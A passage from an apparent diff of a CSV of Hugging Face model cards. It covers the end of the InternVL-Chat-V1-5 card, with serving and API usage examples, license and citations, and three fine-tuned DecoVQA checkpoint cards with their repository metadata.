lmdeploy serve api_server OpenGVLab/InternVL-Chat-V1-5 --server-port 23333
|
| 514 |
+
```
|
| 515 |
+
|
| 516 |
+
To use the OpenAI-style interface, you need to install OpenAI:
|
| 517 |
+
|
| 518 |
+
```shell
|
| 519 |
+
pip install openai
|
| 520 |
+
```
|
| 521 |
+
|
| 522 |
+
Then, use the code below to make the API call:
|
| 523 |
+
|
| 524 |
+
```python
|
| 525 |
+
from openai import OpenAI
|
| 526 |
+
|
| 527 |
+
client = OpenAI(api_key='YOUR_API_KEY', base_url='http://0.0.0.0:23333/v1')
|
| 528 |
+
model_name = client.models.list().data[0].id
|
| 529 |
+
response = client.chat.completions.create(
|
| 530 |
+
model=model_name,
|
| 531 |
+
messages=[{
|
| 532 |
+
'role':
|
| 533 |
+
'user',
|
| 534 |
+
'content': [{
|
| 535 |
+
'type': 'text',
|
| 536 |
+
'text': 'describe this image',
|
| 537 |
+
}, {
|
| 538 |
+
'type': 'image_url',
|
| 539 |
+
'image_url': {
|
| 540 |
+
'url':
|
| 541 |
+
'https://modelscope.oss-cn-beijing.aliyuncs.com/resource/tiger.jpeg',
|
| 542 |
+
},
|
| 543 |
+
}],
|
| 544 |
+
}],
|
| 545 |
+
temperature=0.8,
|
| 546 |
+
top_p=0.8)
|
| 547 |
+
print(response)
|
| 548 |
+
```
|
| 549 |
+
|
| 550 |
+
## License
|
| 551 |
+
|
| 552 |
+
This project is released under the MIT License. This project uses the pre-trained internlm2-chat-20b as a component, which is licensed under the Apache License 2.0.
|
| 553 |
+
|
| 554 |
+
## Citation
|
| 555 |
+
|
| 556 |
+
If you find this project useful in your research, please consider citing:
|
| 557 |
+
|
| 558 |
+
```BibTeX
|
| 559 |
+
@article{chen2024expanding,
|
| 560 |
+
title={Expanding Performance Boundaries of Open-Source Multimodal Models with Model, Data, and Test-Time Scaling},
|
| 561 |
+
author={Chen, Zhe and Wang, Weiyun and Cao, Yue and Liu, Yangzhou and Gao, Zhangwei and Cui, Erfei and Zhu, Jinguo and Ye, Shenglong and Tian, Hao and Liu, Zhaoyang and others},
|
| 562 |
+
journal={arXiv preprint arXiv:2412.05271},
|
| 563 |
+
year={2024}
|
| 564 |
+
}
|
| 565 |
+
@article{gao2024mini,
|
| 566 |
+
title={Mini-internvl: A flexible-transfer pocket multimodal model with 5\% parameters and 90\% performance},
|
| 567 |
+
author={Gao, Zhangwei and Chen, Zhe and Cui, Erfei and Ren, Yiming and Wang, Weiyun and Zhu, Jinguo and Tian, Hao and Ye, Shenglong and He, Junjun and Zhu, Xizhou and others},
|
| 568 |
+
journal={arXiv preprint arXiv:2410.16261},
|
| 569 |
+
year={2024}
|
| 570 |
+
}
|
| 571 |
+
@article{chen2024far,
|
| 572 |
+
title={How Far Are We to GPT-4V? Closing the Gap to Commercial Multimodal Models with Open-Source Suites},
|
| 573 |
+
author={Chen, Zhe and Wang, Weiyun and Tian, Hao and Ye, Shenglong and Gao, Zhangwei and Cui, Erfei and Tong, Wenwen and Hu, Kongzhi and Luo, Jiapeng and Ma, Zheng and others},
|
| 574 |
+
journal={arXiv preprint arXiv:2404.16821},
|
| 575 |
+
year={2024}
|
| 576 |
+
}
|
| 577 |
+
@inproceedings{chen2024internvl,
|
| 578 |
+
title={Internvl: Scaling up vision foundation models and aligning for generic visual-linguistic tasks},
|
| 579 |
+
author={Chen, Zhe and Wu, Jiannan and Wang, Wenhai and Su, Weijie and Chen, Guo and Xing, Sen and Zhong, Muyan and Zhang, Qinglong and Zhu, Xizhou and Lu, Lewei and others},
|
| 580 |
+
booktitle={Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition},
|
| 581 |
+
pages={24185--24198},
|
| 582 |
+
year={2024}
|
| 583 |
+
}
|
| 584 |
+
```
|
| 585 |
+
","{""id"": ""OpenGVLab/InternVL-Chat-V1-5"", ""author"": ""OpenGVLab"", ""sha"": ""5fde09e092da1be5a86ffdae196913570f81c5ad"", ""last_modified"": ""2025-03-25 05:44:05+00:00"", ""created_at"": ""2024-04-18 08:07:48+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 2671, ""downloads_all_time"": null, ""likes"": 413, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""tensorboard"", ""safetensors"", ""internvl_chat"", ""feature-extraction"", ""internvl"", ""custom_code"", ""image-text-to-text"", ""conversational"", ""multilingual"", ""arxiv:2312.14238"", ""arxiv:2404.16821"", ""arxiv:2410.16261"", ""arxiv:2412.05271"", ""base_model:OpenGVLab/InternViT-6B-448px-V1-5"", ""base_model:merge:OpenGVLab/InternViT-6B-448px-V1-5"", ""base_model:internlm/internlm2-chat-20b"", ""base_model:merge:internlm/internlm2-chat-20b"", ""license:mit"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- OpenGVLab/InternViT-6B-448px-V1-5\n- internlm/internlm2-chat-20b\nlanguage:\n- multilingual\nlibrary_name: transformers\nlicense: mit\npipeline_tag: image-text-to-text\ntags:\n- internvl\n- custom_code\nnew_version: OpenGVLab/InternVL2_5-26B\nbase_model_relation: merge"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""InternVLChatModel""], ""auto_map"": {""AutoConfig"": ""configuration_internvl_chat.InternVLChatConfig"", ""AutoModel"": ""modeling_internvl_chat.InternVLChatModel"", ""AutoModelForCausalLM"": ""modeling_internvl_chat.InternVLChatModel""}, ""model_type"": ""internvl_chat"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""chat_template"": ""{{ bos_token }}{% for message in messages %}{{'<|im_start|>' + message['role'] + '\n' + message['content'] + '<|im_end|>' + '\n'}}{% endfor %}{% if add_generation_prompt %}{{ '<|im_start|>assistant\n' }}{% endif %}"", ""eos_token"": ""</s>"", ""pad_token"": ""</s>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": ""modeling_internvl_chat.InternVLChatModel"", ""pipeline_tag"": ""feature-extraction"", ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_intern_vit.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_internlm2.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_internvl_chat.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='conversation.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='examples/image1.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='examples/image2.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='examples/red-panda.mp4', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00007-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00008-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00009-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00010-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00011-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_intern_vit.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_internlm2.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_internvl_chat.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Apr15_22-00-14_SH-IDC1-10-140-37-13/events.out.tfevents.1713190241.SH-IDC1-10-140-37-13.10620.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenization_internlm2.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenization_internlm2_fast.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""Forkei/OpenGVL"", ""minhdang/DeepSeek-VL-7B"", ""Nechama/new_app"", ""woak-oa/DeepDubber-V1""], ""safetensors"": {""parameters"": {""BF16"": 25514186112}, ""total"": 25514186112}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-03-25 05:44:05+00:00"", ""cardData"": ""base_model:\n- OpenGVLab/InternViT-6B-448px-V1-5\n- internlm/internlm2-chat-20b\nlanguage:\n- multilingual\nlibrary_name: transformers\nlicense: mit\npipeline_tag: image-text-to-text\ntags:\n- internvl\n- custom_code\nnew_version: OpenGVLab/InternVL2_5-26B\nbase_model_relation: merge"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": ""modeling_internvl_chat.InternVLChatModel"", ""pipeline_tag"": ""feature-extraction"", ""processor"": null}, ""_id"": ""6620d4d40e8d8b41b2cfbf74"", ""modelId"": ""OpenGVLab/InternVL-Chat-V1-5"", ""usedStorage"": 51032846160}",0,"https://huggingface.co/freesky/InternVL-Chat-V1-5_ft_by_DecoVQA, https://huggingface.co/freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus, https://huggingface.co/freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus_SelectiveLoss",3,https://huggingface.co/empower-dev-staging/internvl-v1-5-sv-v0-llm-only-2-1-1k-filter-on-num-steps-adapter,1,https://huggingface.co/OpenGVLab/InternVL-Chat-V1-5-AWQ,1,,0,"Forkei/OpenGVL, Nechama/new_app, OpenGVLab/InternVL, huggingface/InferenceSupport/discussions/455, minhdang/DeepSeek-VL-7B, woak-oa/DeepDubber-V1",6
|
| 586 |
+
freesky/InternVL-Chat-V1-5_ft_by_DecoVQA,"---
|
| 587 |
+
license: mit
|
| 588 |
+
language:
|
| 589 |
+
- en
|
| 590 |
+
base_model:
|
| 591 |
+
- OpenGVLab/InternVL-Chat-V1-5
|
| 592 |
+
pipeline_tag: visual-question-answering
|
| 593 |
+
---
|
| 594 |
+
|
| 595 |
+
## Citation
|
| 596 |
+
|
| 597 |
+
If you use this finetuned model checkpoint in your research, please cite our paper as follows:
|
| 598 |
+
|
| 599 |
+
```bibtex
|
| 600 |
+
@misc{zhang2024visualquestiondecompositionmultimodal,
|
| 601 |
+
title={Visual Question Decomposition on Multimodal Large Language Models},
|
| 602 |
+
author={Haowei Zhang and Jianzhe Liu and Zhen Han and Shuo Chen and Bailan He and Volker Tresp and Zhiqiang Xu and Jindong Gu},
|
| 603 |
+
year={2024},
|
| 604 |
+
eprint={2409.19339},
|
| 605 |
+
archivePrefix={arXiv},
|
| 606 |
+
primaryClass={cs.CL},
|
| 607 |
+
url={https://arxiv.org/abs/2409.19339},
|
| 608 |
+
}
|
| 609 |
+
```","{""id"": ""freesky/InternVL-Chat-V1-5_ft_by_DecoVQA"", ""author"": ""freesky"", ""sha"": ""a2a70d5e7adbc0dc3c14e2998592209fad734689"", ""last_modified"": ""2024-10-06 18:32:05+00:00"", ""created_at"": ""2024-09-20 13:31:30+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""internvl_chat"", ""visual-question-answering"", ""custom_code"", ""en"", ""arxiv:2409.19339"", ""base_model:OpenGVLab/InternVL-Chat-V1-5"", ""base_model:finetune:OpenGVLab/InternVL-Chat-V1-5"", ""license:mit"", ""region:us""], ""pipeline_tag"": ""visual-question-answering"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- OpenGVLab/InternVL-Chat-V1-5\nlanguage:\n- en\nlicense: mit\npipeline_tag: visual-question-answering"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""InternVLChatModel""], ""auto_map"": {""AutoConfig"": ""configuration_internvl_chat.InternVLChatConfig"", ""AutoModel"": ""modeling_internvl_chat.InternVLChatModel"", ""AutoModelForCausalLM"": ""modeling_internvl_chat.InternVLChatModel""}, ""model_type"": ""internvl_chat"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""chat_template"": ""{{ bos_token }}{% for message in messages %}{{'<|im_start|>' + message['role'] + '\n' + message['content'] + '<|im_end|>' + '\n'}}{% endfor %}{% if add_generation_prompt %}{{ '<|im_start|>assistant\n' }}{% endif %}"", ""eos_token"": ""</s>"", ""pad_token"": ""</s>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='all_results.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00007-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00008-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00009-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00010-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00011-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenization_internlm2.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='train_results.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='trainer_state.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_log.txt', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""BF16"": 25525196160}, ""total"": 25525196160}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-10-06 18:32:05+00:00"", ""cardData"": ""base_model:\n- OpenGVLab/InternVL-Chat-V1-5\nlanguage:\n- en\nlicense: mit\npipeline_tag: visual-question-answering"", ""transformersInfo"": null, ""_id"": ""66ed7932453e1d0535d2b476"", ""modelId"": ""freesky/InternVL-Chat-V1-5_ft_by_DecoVQA"", ""usedStorage"": 51052012317}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=freesky/InternVL-Chat-V1-5_ft_by_DecoVQA&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bfreesky%2FInternVL-Chat-V1-5_ft_by_DecoVQA%5D(%2Ffreesky%2FInternVL-Chat-V1-5_ft_by_DecoVQA)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 610 |
+
freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus,"---
|
| 611 |
+
license: mit
|
| 612 |
+
pipeline_tag: visual-question-answering
|
| 613 |
+
language:
|
| 614 |
+
- en
|
| 615 |
+
base_model:
|
| 616 |
+
- OpenGVLab/InternVL-Chat-V1-5
|
| 617 |
+
---
|
| 618 |
+
## Citation
|
| 619 |
+
|
| 620 |
+
If you use this finetuned model checkpoint in your research, please cite our paper as follows:
|
| 621 |
+
|
| 622 |
+
```bibtex
|
| 623 |
+
@misc{zhang2024visualquestiondecompositionmultimodal,
|
| 624 |
+
title={Visual Question Decomposition on Multimodal Large Language Models},
|
| 625 |
+
author={Haowei Zhang and Jianzhe Liu and Zhen Han and Shuo Chen and Bailan He and Volker Tresp and Zhiqiang Xu and Jindong Gu},
|
| 626 |
+
year={2024},
|
| 627 |
+
eprint={2409.19339},
|
| 628 |
+
archivePrefix={arXiv},
|
| 629 |
+
primaryClass={cs.CL},
|
| 630 |
+
url={https://arxiv.org/abs/2409.19339},
|
| 631 |
+
}
|
| 632 |
+
```","{""id"": ""freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus"", ""author"": ""freesky"", ""sha"": ""f04b0efb0c91055d852d51045db2eba674f58e18"", ""last_modified"": ""2024-10-06 18:33:21+00:00"", ""created_at"": ""2024-09-20 21:30:57+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 1, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""internvl_chat"", ""visual-question-answering"", ""custom_code"", ""en"", ""arxiv:2409.19339"", ""base_model:OpenGVLab/InternVL-Chat-V1-5"", ""base_model:finetune:OpenGVLab/InternVL-Chat-V1-5"", ""license:mit"", ""region:us""], ""pipeline_tag"": ""visual-question-answering"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- OpenGVLab/InternVL-Chat-V1-5\nlanguage:\n- en\nlicense: mit\npipeline_tag: visual-question-answering"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""InternVLChatModel""], ""auto_map"": {""AutoConfig"": ""configuration_internvl_chat.InternVLChatConfig"", ""AutoModel"": ""modeling_internvl_chat.InternVLChatModel"", ""AutoModelForCausalLM"": ""modeling_internvl_chat.InternVLChatModel""}, ""model_type"": ""internvl_chat"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""chat_template"": ""{{ bos_token }}{% for message in messages %}{{'<|im_start|>' + message['role'] + '\n' + message['content'] + '<|im_end|>' + '\n'}}{% endfor %}{% if add_generation_prompt %}{{ '<|im_start|>assistant\n' }}{% endif %}"", ""eos_token"": ""</s>"", ""pad_token"": ""</s>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='all_results.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00007-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00008-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00009-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00010-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00011-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenization_internlm2.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='train_results.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='trainer_state.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_log.txt', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""BF16"": 25525196160}, ""total"": 25525196160}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-10-06 18:33:21+00:00"", ""cardData"": ""base_model:\n- OpenGVLab/InternVL-Chat-V1-5\nlanguage:\n- en\nlicense: mit\npipeline_tag: visual-question-answering"", ""transformersInfo"": null, ""_id"": ""66ede991afa27ebdac9e76e6"", ""modelId"": ""freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus"", ""usedStorage"": 51052012317}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bfreesky%2FInternVL-Chat-V1-5_ft_by_DecoVQAplus%5D(%2Ffreesky%2FInternVL-Chat-V1-5_ft_by_DecoVQAplus)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 633 |
+
freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus_SelectiveLoss,"---
|
| 634 |
+
license: mit
|
| 635 |
+
language:
|
| 636 |
+
- en
|
| 637 |
+
base_model:
|
| 638 |
+
- OpenGVLab/InternVL-Chat-V1-5
|
| 639 |
+
pipeline_tag: visual-question-answering
|
| 640 |
+
---
|
| 641 |
+
## Citation
|
| 642 |
+
|
| 643 |
+
If you use this finetuned model checkpoint in your research, please cite our paper as follows:
|
| 644 |
+
|
| 645 |
+
```bibtex
|
| 646 |
+
@misc{zhang2024visualquestiondecompositionmultimodal,
|
| 647 |
+
title={Visual Question Decomposition on Multimodal Large Language Models},
|
| 648 |
+
author={Haowei Zhang and Jianzhe Liu and Zhen Han and Shuo Chen and Bailan He and Volker Tresp and Zhiqiang Xu and Jindong Gu},
|
| 649 |
+
year={2024},
|
| 650 |
+
eprint={2409.19339},
|
| 651 |
+
archivePrefix={arXiv},
|
| 652 |
+
primaryClass={cs.CL},
|
| 653 |
+
url={https://arxiv.org/abs/2409.19339},
|
| 654 |
+
}
|
| 655 |
+
```","{""id"": ""freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus_SelectiveLoss"", ""author"": ""freesky"", ""sha"": ""9a135222b97e214f8794352e2adec1f78ca107c7"", ""last_modified"": ""2024-10-06 18:32:36+00:00"", ""created_at"": ""2024-09-20 22:51:27+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""internvl_chat"", ""visual-question-answering"", ""custom_code"", ""en"", ""arxiv:2409.19339"", ""base_model:OpenGVLab/InternVL-Chat-V1-5"", ""base_model:finetune:OpenGVLab/InternVL-Chat-V1-5"", ""license:mit"", ""region:us""], ""pipeline_tag"": ""visual-question-answering"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- OpenGVLab/InternVL-Chat-V1-5\nlanguage:\n- en\nlicense: mit\npipeline_tag: visual-question-answering"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""InternVLChatModel""], ""auto_map"": {""AutoConfig"": ""configuration_internvl_chat.InternVLChatConfig"", ""AutoModel"": ""modeling_internvl_chat.InternVLChatModel"", ""AutoModelForCausalLM"": ""modeling_internvl_chat.InternVLChatModel""}, ""model_type"": ""internvl_chat"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""chat_template"": ""{{ bos_token }}{% for message in messages %}{{'<|im_start|>' + message['role'] + '\n' + message['content'] + '<|im_end|>' + '\n'}}{% endfor %}{% if add_generation_prompt %}{{ '<|im_start|>assistant\n' }}{% endif %}"", ""eos_token"": ""</s>"", ""pad_token"": ""</s>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='all_results.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00007-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00008-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00009-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00010-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00011-of-00011.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenization_internlm2.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='train_results.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='trainer_state.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_log.txt', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""BF16"": 25525196160}, ""total"": 25525196160}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-10-06 18:32:36+00:00"", ""cardData"": ""base_model:\n- OpenGVLab/InternVL-Chat-V1-5\nlanguage:\n- en\nlicense: mit\npipeline_tag: visual-question-answering"", ""transformersInfo"": null, ""_id"": ""66edfc6fcaf6968847a7294d"", ""modelId"": ""freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus_SelectiveLoss"", ""usedStorage"": 51052012317}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=freesky/InternVL-Chat-V1-5_ft_by_DecoVQAplus_SelectiveLoss&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bfreesky%2FInternVL-Chat-V1-5_ft_by_DecoVQAplus_SelectiveLoss%5D(%2Ffreesky%2FInternVL-Chat-V1-5_ft_by_DecoVQAplus_SelectiveLoss)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
Juggernaut-XL-v9_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv
ADDED
|
@@ -0,0 +1,69 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
